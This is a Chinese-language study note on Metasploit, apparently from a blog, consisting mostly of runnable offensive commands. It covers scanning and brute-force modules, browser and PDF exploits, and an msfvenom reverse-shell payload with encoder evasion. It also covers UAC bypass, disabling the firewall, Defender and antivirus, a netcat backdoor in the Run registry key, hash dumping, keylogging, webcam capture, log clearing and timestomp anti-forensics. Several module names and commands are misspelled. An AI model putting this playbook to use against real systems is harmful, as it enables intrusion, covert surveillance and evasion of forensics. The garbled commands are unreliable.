MSF筆記

全稱:metasploit

0*01模塊介紹

/usr/share/metasploit-framework/modules

auxiliary用於各種輔助功能比如：信息收集、枚舉、指紋探測、掃描

encoders編碼模塊，對payload進行加密

evasion

exploits漏洞利用腳本目錄

nops維持payload穩定性

payloads

post

0*02簡單使用

msfupdate更新

命令msfconsole最流行的使用方式

reload_all 手動添加模塊後重新加載

msfconsole -q安靜啓動，不顯示banner信息

-r

banner小貼士以及其他信息

color 關閉顏色提示

connect-h 相當於console界面的nc

show auxiliary/exploits/payloads/encoders/nops 顯示模塊的信息

search關鍵字可以多條件搜索

use dos/windows/smb/ms09_001_write

　　show 選中模塊後的命令 options/advanced... edit

check 執行前檢查漏洞利用back

0*03數據庫

msfdb start

service postgresql start

netstat -pantu | grep 5432檢查服務

db_status

db_rebuild_cache 建立緩存，提高速度

db_nmap hosts

0*04基本功能

每個模塊下set /unset設置變量/取消變量 setg/unsetg設置全局/取消全局 save

run /exploit

jobs /kill 0

load/unload/loadpath 加載/卸載外部工具插件/加載自己開發的插件

show targets

session

　　session -l /-i 查看shell會話

route

irb

resource 指定資源文件簡化攻擊模塊配置 .rc文件是默認文件名

簡單攻擊：use 模塊

show options 查看需要設置的項

set rhost 設置對方ip

set target 指定操作系統

set payload 路徑/模塊

set lhost 本地ip

exploit -j 注意防火牆

generate 生成payload

generate -b '\x00''\ff' 繞過壞字符

generate -s 10 生成的payload前面加10個字符實現一定繞過

generate -t python/java/c ... 以其他語言格式生成

0*05meterpreter

meterpreter 是一個更高級更隱蔽可擴展的payload

命令：

help background從meter界面來回切換msf界面

cd pwd ls/dir cat mkdir/rmdir創建刪除文件夾常用linux文件命令都可以用

lpwd 顯示linux當前工作目錄

run/bgrun 正常/後臺運行各種腳本模塊等

clearev download 清除目標系統日誌/從目標主機下載文件到攻擊主機 eventvwr查看windows日誌

　　upload /usr/share/window-bainares/nc.exe c:\\windows\\system32

execute -f **.exe -i -H 執行上傳工具 -f指定程序 -i進行交互 -h隱藏

getuid /getsystem /get privs/getproxy/ getpid 查看用戶賬號/強勢獲取爲sys/查看當前權限/查看滲透到目標系統生成的進程 ps查看進程 migrate port 更改進程

hashdump=runpost/windows/gather/hashdump 獲取hashdump

sysinfo /ps/ kill-pid / reboot/ shutdown /shell

show_mount /search-f /autoexec.bat

arp /netstat/ ipconfig /route

idletime/ resource 查看目標操作系統空閒時間

record_mic /webcam_list /webcam_snap -i 1 -v false 記錄麥克風聲音/列出所有攝像頭/每隔一秒拍照

0*06

信息收集

db_nmap -[s v n f ....] [ip]

search arp

　　use auxiliary/scanner/discovery/arp_sweep

　　set interface rhosts shost smac thread

search portscan

　　use auxiliary/scanne/portscan/syn

　　set interface rhosts shost smac thread

ldle掃描

　　use auxiliary/scanne/ip/ipidseq

　　set rhost ip

udp掃描

　　use auxiliary/scanner/discovery/udp_sweep

　　use auxiliary/scanner/discovery/udp_probe

密碼嗅探

　　use auxiliary/sniffer/psnuffle

　　支持.cap文件 pop3 imap ftp http get協議

snmp掃描

　　vi /etc/default/snmpd #偵聽地址0.0.0.0

　　use auxiliary/scanner/snmp/snmp_login

　　use auxiliary/scanner/snmp/snmp_enum

　　use auxiliary/scanner/snmp/snmp_enumusers

　　use auxiliary/scanner/snmp/snmp_enumshares

smb掃描

　　use auxiliary/scanner/smb/smb_version

　　use auxiliary/scanner/smb/pipe_auditor

　　use auxiliary/scanner/smb/pipe_dcerpc_auditor

　　use auxiliary/scanner/smb/smb_enumshares

　　use auxiliary/scanner/smb/smb_enumusers

　　use auxiliary/scanner/smb/smb_lookupsid

ssh掃描

　　use auxiliary/scanner/ssh/ssh_version

　　use auxiliary/scanner/ssh/ssh_login 密碼爆破

　　set userpass_file /usr/share/metasploit

　　/usr/share/metaspolit-framework/data/wordlists/root_userpass.txt

　　set verbose false

　　use auxiliary/scanner/ssh/ssh_login_pubkey公鑰登陸

　　set key_file id rsa

　　set username root

系統補丁

　　use post/windows/gather/enum_patches基於已經取得session

　　show advanced

　　set verbose yes

　　know bug in WMI query,try migrating to another process檢查失敗請遷移進程

　　get pid

　　migrate [port]

mssql掃描

　　tcp 1433/udp 1434

　　use auxiliary/scanner/mssql/mssql_ping

爆破mssql密碼

　　use auxiliary/scanner/mssql/mssql_login

遠程執行代碼

　　use auxiliary/scanner/mssql/mssql_exec

　　set cmd net user user pass /add

FTP版本掃描

　　use auxiliary/scanner/ftp/ftp_version

　　use auxiliary/scanner/ftp/anonymons

　　use auxiliary/scanner/ftp/ftp_login

use auxiliary/scanner/[tab]

-display all 479 possibilities?(y or n)

VNC密碼破解

　　use auxiliary/scanner/vnc/vcn_login

VNC無密碼訪問

　　use auxiliary/scanner/vnc/vcn_none_auth

　　.supported；none.free access!成功

RDP遠程桌面漏洞

　　use auxiliary/scanner/rdp/ms12_020_check

　　the target is vulnerable.-->search ms12-020 搜索利用

設備後門

　　use auxiliary/scanner/ssh/juniper_backdoor

　　use auxiliary/scanner/ssh/fortinet_backdoor

vmware esxi密碼爆破

　　use auxiliary/scanner/vmware/vmauthd_login

　　use auxiliary/scanner/vmware/vmauthd_enum_vms

利用web api遠程開啓虛擬機

　　use auxiliary/scanner/vmware/poweron_vm

0*07HTTP弱點掃描一

過期證書：use auxiliary/scanner/http/cert

顯示目錄及文件

　　use auxiliary/scanner/http/dir_listing

　　use auxiliary/scanner/http/files_dir

WebDAV Unicode編碼身份驗證繞過

　　use auxdiliary/scanner/http/dir_webdav_unicode_bypass

Tomcat管理登錄

　　use aunalary/scanner/http/tomcat_mgr_login

基於HTTP方法的身份驗證繞過

　　use auxliary/scanner/http:/verb_auth_bypass

- Wordpress密碼爆破

　　use auxiliary/scanner/http/wordpress_login_enum

　　set URI /wordpress/wp-login.php

WMAP WEB應用掃描器

根據 SQLMAP的工作方式開發

load wmap

wmap_sites -a http://1.1.1.1

wmap_sites -l 查看已經添加的站點

wmap_targets -t http://1.1.1.1/mutillidae/index.php 指定目標

wmap_ run -t 顯示哪些具體模塊

wmap_ run -e 具體執行哪些模塊

wmap vulns -l 查看結果

vuIns

0*08HTTP弱點掃描二

load openvas

　　db_import ***.nbe

msf調用nessus執行掃描

　　load nessus

　　nessus_help

　　nessus_connect admin:password@ip 連接

　　nessus_policy_list 查看配置策略

　　nessus_scan_new

　　nessus_report_list

利用 Acrobat Reader漏洞執行 payload

　　構造PDF文件 exploit/windows/fileformat/ adobe_utilprint

　　構造惡意網站： exploit/windows/ /browser/ adobe_utilpri

　　Meterpreter

　　use pnv

　　run post/windows/capture/keylog_recorder

利用Fash插件漏洞執行 payload

　　use exploit/multi/browser/adobe_flash_hacking_team_uaf

　　use exploit/multi/browser/adobe_flash_opaque_background_uaf

　　use auxiliary/server/browser_autopwn2

利用瀏覽器漏洞執行 payload

use exploit/windows/browser/ms14_064_ole_code_execution

0*09後滲透測試

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=本機 LPORT=本地端口 -b "\x00" -e x86/shikata_ga_nai -i 7 -f exe -o a.exe

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

獲取system

getsystem 大多數失敗,需要繞過UAC,以下需要先獲得session

use exploit/windows/local/ask

use exploit/windows/local/bypassuac

use exploit/windows/local/bypassuac_injection 動態鏈接庫dll注入或者理解爲內存注入

利用漏洞直接獲取system

use exploit/windows/local/ms13_053_schlamperei

use'exploit/windows/local/ms13_081_track_popup_menu

use exploit/windows/local/ms13_097_ie_registry_symlink

use exploit/windows/local/ppr_flatten_res

圖形化 payload

set payload windows/vncinject/reverse_tcp

set viewonly no#可操作

hashdump

Psexec模塊之 Passthehash

use exploit/windows/smb/sexes

set smbpass hash

需要提前關閉UAC

cmd.exe/k%windir%System32/reg.exe ADDHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /vEnableLUA/t REG_DWORD /d 0 /f

cmd.exe/k%windir%System32/reg.exe ADDHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /vLocalAccountTokenFilterPolicy/t REG_DWORD /d 1 /f

關閉防火牆(需要system權限)

netsh advfirewall set allprofiles state on/off

關閉windefend

net stop windefend

bitlocker磁盤加密

manage-bde -off C:

manage-bde -status C:

關閉dep

bcdedit.exe /set{current} nx AlwaysOff

殺死防病毒軟件

run killav

run post/windows/manage/killav

開啓遠程桌面服務

run post/windows/manage/enable_rdp

run getgui-e

run getgui -u yuanfh -p pass

run multi_console_command -rc clean_up_20180824.1855.rc

查看遠程桌面

screenshot

use espia

screengrab

用註冊表添加NC後門服務( meterpreter)

-upload /usr/share/windows-binaries/nc. exe C:\\windowst\\system32

-reg enumkey -k 枚舉當前主鍵下的啓動

HKLM\\software\\microsoft\\windows\\currentversion\\run

-reg setval-k

HKLM\\software\\microsoft\\windows\\currentversion\\run-v nc-d

'C:windows\system32\nc.exe Ldp 444-e cmd.exe'

-reg queryval-k

HKLM\\software\\microsoft\\windows\\currentversion\\Run-v nc

打開防火牆端口( meterpreter)

-execute -f cmd -i -H 隱蔽進桌面

-netsh firewall show opmode

-netsh firewall ad portopening TCP 4444 "test" ENABLE ALL

-shutdown -r -t 0

-nc 1.1.1.1 4444

抓包( meterpreter)

load sniffer

sniffer_interfaces 查看網卡接口

sniffer_start 2 使用網卡號

sniffer_dump 2 1. cap /sniffer- dump 2 1.cap

在內存中緩存區塊循環存儲抓包(50000包)，不寫硬盤

智能過濾 meterpreter流量，傳輸全程使用 SSL/TLS加密

解包( meterpreter)

use auxiliary/sniffer/psnuffle

set PCAPFILE 1.cap

搜索文件( meterpreter)

-search -f *.ini

-search -d \\路徑 -f *.*

john the ripper破解口令( meterpreter的system權限)

-use post/windows/gather/hashdump

-run 保存在/tmp目錄

.文件系統訪問會留下痕跡，電子取證重點關注

.滲透測試和攻擊者往往希望銷燬文件系統訪問痕跡

.最好的避免被電子取證發現的方法：不要碰文件系統

-Meterpreter的先天優勢所在(完全基於內存)

.MAC時間(Modified/Accessed/Changed)LINUX系統

- Is -I --time=atime/ctime 1.txt 默認是mtime

- stat 1.txt 列出mac時間

- touch -d "2 days ago" 1.txt 修改mac時間

- touch -t 1501010101 1.txt -年-月-日-時-分-秒

MACE ：MFT entry WINDOWS系統

-MFT：NTFS文件系統的主文件分配表 Master File Table

-通常1024字節或2個硬盤扇區，其中存放多項enty信息

-包含文件大量信息(大小名稱目錄位置磁盤位置創建日期)

-更多信息可研究文件系統取證分析技術

Timestomp( meterpreter)

-timestomp -v 1.txt 顯示詳細時間

-timestomp -f c:\\autoexec.bat 1.txt

-b -r擦除MACE時間信息，目前此參數功失效

-m/-a/-c/-e/-z

-timestomp- z MM/DD/YYYY HH24:MI:SS" 2.txt

SQL優化-20231016

Python筆記-高級變量

Python筆記之-函數基礎

等保2.0三級常用的設備

Python筆記之-基礎概念

Linux之備份以及恢復

https://yachay.unat.edu.pe/blog/index.php?comment_area=format_blog&comment_component=blog&comment_co

linux以太網驅動總結